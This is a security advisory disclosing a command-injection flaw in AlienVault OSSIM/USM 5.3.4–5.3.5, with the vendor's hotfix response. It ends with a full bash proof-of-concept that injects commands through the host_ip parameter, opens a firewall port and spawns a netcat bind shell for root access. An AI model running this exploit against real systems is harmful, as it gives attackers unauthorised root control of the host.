SSD Advisory – AlienVault OSSIM / USM Remote Command Execution

April 3, 2017 admin Remote Command Execution, SecuriTeam Secure Disclosure

Credit to Author: Maor Schwartz| Date: Mon, 03 Apr 2017 07:29:37 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerability Summary
The following advisory describes a Remote Command Execution vulnerability found in AlientVault OSSIM and USM version 5.3.4 and version 5.3.5.

OSSIM, AlienVault’s Open Source Security Information and Event Management (SIEM) product, provides you with a feature-rich open source SIEM complete with event collection, normalization and correlation. Launched by security engineers because of the lack of available open source products, OSSIM was created specifically to address the reality many security professionals face: A SIEM, whether it is open source or commercial, is virtually useless without the basic security controls necessary for security visibility.

AlienVault Unified Security Management (USM) is a comprehensive approach to security monitoring, delivered in a unified platform. The USM platform includes five essential security capabilities that provide resource-constrained organizations with all the security essentials needed for effective threat detection, incident response, and compliance, in a single pane of glass.

Designed to monitor cloud, hybrid cloud and on-premises environments, AlienVault USM significantly reduces complexity and deployment time so that you can go from installation to first insight in minutes – talk about fast threat detection!

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor Responses
“We have confirmed that this issue impacts v5.3.4 and v5.3.5 of OSSIM and USM. As a result, we will be pushing a hotfix release (v5.3.6) to all users which will patch this vulnerability” for more details you can see the release notes released here: https://www.alienvault.com/forums/discussion/8415/alienvault-v5-3-6-hotfix-important-update

Vulnerability Details
The vulnerability can be found in the default installation without any plugins. The function get_fqdn don’t validate user input.

The function get_fqdn execute nslookup (executable=/bin/bash nslookup) with parameter (%s), when %s is the host_ip in the control of user. A user can concatenate commands to run by adding “;” to the “host_ip” parameter.

Proof Of Concept:

 #!/bin/bash    usage() {  echo “Usage: $0 <ip>”  }    info() {  echo “[+] $1”  }    if [ -z “$1″ ]; then  usage >&1  exit 1  fi    IP=”$1”  PORT=8888    nohup curl -ks -XPOST -d   ‘host_ip=127.0.0.1;  iptables-save > /tmp/.rules;  iptables -I INPUT -p tcp –dport ‘$PORT’ -j ACCEPT;  mkfifo /tmp/ncshell;  sh /tmp/ncshell | nc -l -p ‘$PORT’ > /tmp/ncshell;  rm -f /tmp/ncshell;  iptables-restore < /tmp/.rules;  rm -f /tmp/.rules’   “https://$IP:40011/av/api/1.0/system/local/network/fqdn” >/dev/null 2>&1 &    info “Exploit running…”  sleep 2  info ‘Now you should have your root shell: (^D to exit)’    rc=0  nc $IP $PORT  info ‘Terminated'</ip>

https://blogs.securiteam.com/index.php/feed